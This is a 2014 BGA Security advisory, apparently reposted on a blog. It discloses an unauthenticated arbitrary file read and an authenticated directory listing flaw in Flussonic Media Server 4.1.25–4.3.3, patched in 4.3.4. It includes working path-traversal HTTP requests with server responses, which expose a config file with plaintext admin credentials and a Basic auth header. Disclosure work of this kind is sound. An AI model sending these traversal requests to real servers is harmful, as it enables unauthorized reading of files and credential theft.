Bài liên quan
Document Title:============Release Date:===========June 29, 2014Product & Service Introduction:========================Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5).Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network.Abstract Advisory Information:=======================BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3Vulnerability Disclosure Timeline:=========================June 26, 2014 : Contact with VendorJune 26, 2014 : Vendor ResponseJune 26, 2014 : Version 4.3.4 DeployedJune 29, 2014 : Public DisclosureDiscovery Status:=============PublishedAffected Product(s):===============Erlyvideo, LLCProduct: Flussonic Media Server 4.1.25 - 4.3.3 Exploitation Technique:==================AFR: Remote, UnauthenticatedADL: Remote, AuthenticatedSeverity Level:===========HighTechnical Details & Description:========================1. Arbitrary File Read (Unauthenticated)It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method.2. Arbitrary Directory Listing (Authenticated)It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”. Proof of Concept (PoC):==================Proof of Concept AFR Request & Response:GET /../../../etc/flussonic/flussonic.conf HTTP/1.1Host: 6.6.6.100:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveHTTP/1.1 200 OKConnection: keep-aliveServer: CowboyDate: Thu, 26 Jun 2014 09:50:57 GMTContent-Length: 191Content-Type: text/plainLast-Modified: Tue, 24 Jun 2014 22:10:53 GMTEtag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687# Default ports Flussonic M1 Media server listens onhttp 80;http 8080;rtmp 1935;rtsp 554;pulsedb /var/run/flussonic;edit_auth flussonic letmein!;live mylive;file vod {path priv;}2. Proof of Concept ADR Request & Response:GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1Host: 6.6.6.100:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateAuthorization: Basic Zmx1c3NvbmljOmxldG1laW4hConnection: keep-aliveHTTP/1.1 200 OKConnection: keep-aliveServer: CowboyDate: Thu, 26 Jun 2014 11:04:12 GMTContent-Length: 7555X-Route-Time: 28X-Run-Time: 8090Content-Type: application/json{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},………{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}Solution Fix & Patch:================Update version 4.3.4Security Risk:==========The risk of the vulnerabilities above estimated as high and medium.Credits & Authors:==============Bilgi Güvenliði AkademisiDisclaimer & Information:===================The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domain: http://bga.com.tr/advisories.htmlSocial: http://twitter.com/bgasecurityContact: bilgi@bga.com.tr Copyright © 2014 | BGA
Post a Comment